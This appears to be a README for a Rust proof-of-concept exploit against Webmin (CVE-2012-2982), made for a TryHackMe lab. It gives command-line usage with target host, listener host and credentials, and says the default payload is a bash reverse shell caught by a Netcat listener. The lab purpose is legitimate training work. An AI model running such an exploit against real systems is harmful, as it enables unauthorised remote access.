This PoC exploit for CVE-2012-2982 was written as an exercise for the "Intro to PoC scripting" Room on TryHackMe.
The room can be found here: https://tryhackme.com/room/intropocscripting
I was originally going to use Python to follow along, but decided to practice my Rust skills instead.
I also saw that nearly every single non-Metasploit implementation on Github was in Python, so I figured that bringing something new to the table might be fun.
Note: The program spawns a Netcat listener by default.
If Netcat isn't in your path, or you want to run your own listener, run the program with the -d flag.
From Source (Rust and Cargo required):
# To get detailed info about arguments:
cargo run -- --help
# General command structure:
cargo run -- <rhost> <lhost> <username> <password> [options]From Binary:
# To get detailed info about arguments:
./cve-2012-2982 --help
# General command structure:
./cve-2012-2982 <rhost> <lhost> <username> <password> [options]Program defaults:
- rport=10000 (Webmin's default)
- lport=1337
- payload = generic bash tcp reverse shell